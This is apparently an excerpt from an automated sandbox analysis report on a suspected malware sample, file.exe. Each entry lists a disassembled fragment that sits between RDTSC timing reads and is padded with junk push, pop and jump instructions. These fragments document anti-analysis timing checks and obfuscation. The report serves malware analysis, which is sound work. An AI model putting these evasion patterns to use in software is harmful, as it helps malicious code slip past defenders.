                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172CA8 second address: 1172CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB6CC860F2Ah 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FB6CC860F2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172CCA second address: 1172CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB6CD925507h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172CEA second address: 1172CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117794C second address: 1177967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CD925506h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177B07 second address: 1177B11 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6CC860F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156312 second address: 1156316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C279 second address: 117C283 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB6CC860F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C283 second address: 117C28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C28B second address: 117C28F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C784 second address: 117C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB6CD925506h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C7A1 second address: 117C7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C7A7 second address: 117C7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CA82 second address: 117CA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CA86 second address: 117CAD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925508h 0x00000007 jnp 00007FB6CD9254F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FB6CD925515h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CAD3 second address: 117CAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181152 second address: 1181158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181158 second address: 1181168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181168 second address: 118116C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118116C second address: 1181180 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FB6CC860F2Eh 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DA21 second address: 110DA42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925507h 0x00000009 js 00007FB6CD9254F6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DA42 second address: 110DA68 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB6CC860F26h 0x00000008 jmp 00007FB6CC860F34h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FB6CC860F26h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DA68 second address: 110DA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB6CD925504h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jng 00007FB6CD9254FCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185645 second address: 118564F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E0B6 second address: 114E0CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c je 00007FB6CD9254F6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E0CB second address: 1135160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FB6CC860F26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FB6CC860F28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 call dword ptr [ebp+122D2AD6h] 0x0000002d push esi 0x0000002e jnp 00007FB6CC860F2Ah 0x00000034 pushad 0x00000035 popad 0x00000036 push edx 0x00000037 pop edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jp 00007FB6CC860F26h 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E163 second address: 114E169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E9F8 second address: 114E9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E9FC second address: 114EA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F111 second address: 114F16D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB6CC860F28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB6CC860F28h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 pushad 0x00000019 mov dword ptr [ebp+122D3749h], edx 0x0000001f mov dword ptr [ebp+122D1C6Eh], ebx 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp+12482D96h] 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FB6CC860F28h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 or di, EE0Ah 0x0000004b push eax 0x0000004c push esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jp 00007FB6CC860F26h 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F16D second address: 1135C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov cl, AFh 0x0000000d pushad 0x0000000e mov edx, dword ptr [ebp+122D3A2Eh] 0x00000014 sub ebx, dword ptr [ebp+122D2B2Bh] 0x0000001a popad 0x0000001b popad 0x0000001c call dword ptr [ebp+122D39EFh] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135C6E second address: 1135C8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F32h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135C8B second address: 1135C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118499B second address: 11849A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184D78 second address: 1184D86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB6CD9254F8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184ECF second address: 1184EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FB6CC860F39h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118505F second address: 118509D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB6CD925505h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FB6CD925501h 0x00000015 jnl 00007FB6CD9254F6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118509D second address: 11850A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185213 second address: 1185231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6CD925501h 0x0000000c jnc 00007FB6CD9254F6h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185231 second address: 118523B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB6CC860F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189118 second address: 1189120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189120 second address: 1189126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189126 second address: 118916C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB6CD925500h 0x0000000a pushad 0x0000000b jmp 00007FB6CD925504h 0x00000010 jnl 00007FB6CD9254F6h 0x00000016 jmp 00007FB6CD9254FBh 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007FB6CD9254F6h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118916C second address: 1189170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E7B1 second address: 118E7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925507h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D4F1 second address: 118D500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F2Bh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D500 second address: 118D526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FB6CD925508h 0x0000000e jmp 00007FB6CD925500h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D7DC second address: 118D7F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jnc 00007FB6CC860F26h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 ja 00007FB6CC860F26h 0x0000001c pop edi 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D7F9 second address: 118D805 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6CD9254FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D1EC second address: 118D204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FB6CC860F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB6CC860F2Ch 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D204 second address: 118D221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925507h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D221 second address: 118D225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DE8A second address: 118DE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E009 second address: 118E020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB6CC860F2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E020 second address: 118E052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CD9254FEh 0x00000009 jg 00007FB6CD9254F6h 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FB6CD9254F6h 0x0000001a jmp 00007FB6CD9254FFh 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E052 second address: 118E056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E1CA second address: 118E1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925503h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E1E1 second address: 118E1E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B27 second address: 1192B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B2B second address: 1192B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B31 second address: 1192B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B37 second address: 1192B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B4A second address: 1192B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B4E second address: 1192B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192B52 second address: 1192B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB6CD9254F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E77 second address: 1192E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB6CC860F26h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E81 second address: 1192EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925506h 0x00000007 jp 00007FB6CD9254F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jl 00007FB6CD9254F6h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193350 second address: 119335E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnc 00007FB6CC860F26h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119335E second address: 119336B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FB6CD9254FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119365F second address: 1193683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CC860F2Bh 0x00000009 jmp 00007FB6CC860F34h 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119399B second address: 11939D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB6CD9254FFh 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB6CD925509h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193AF3 second address: 1193AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193AF9 second address: 1193B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007FB6CD9254FEh 0x0000000b jp 00007FB6CD9254F6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197517 second address: 1197572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB6CC860F31h 0x0000000b popad 0x0000000c js 00007FB6CC860F48h 0x00000012 jmp 00007FB6CC860F38h 0x00000017 jmp 00007FB6CC860F2Ah 0x0000001c jmp 00007FB6CC860F31h 0x00000021 push eax 0x00000022 push edx 0x00000023 jne 00007FB6CC860F26h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197572 second address: 1197576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197576 second address: 1197595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197595 second address: 11975A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB6CD9254FEh 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11994E4 second address: 11994E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11994E8 second address: 11994F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3DF4 second address: 11A3DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A26D5 second address: 11A26DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A26DD second address: 11A26F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CC860F31h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A26F8 second address: 11A270B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edi 0x0000000b jbe 00007FB6CD925502h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A270B second address: 11A2711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A29F3 second address: 11A29F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A29F7 second address: 11A2A24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FB6CC860F2Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FB6CC860F2Ch 0x00000015 popad 0x00000016 jc 00007FB6CC860F53h 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FB6CC860F26h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2A24 second address: 11A2A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2B64 second address: 11A2B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A2E2B second address: 11A2E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EC17 second address: 114EC1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EC1D second address: 114EC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6CD925504h 0x00000011 rdtsc
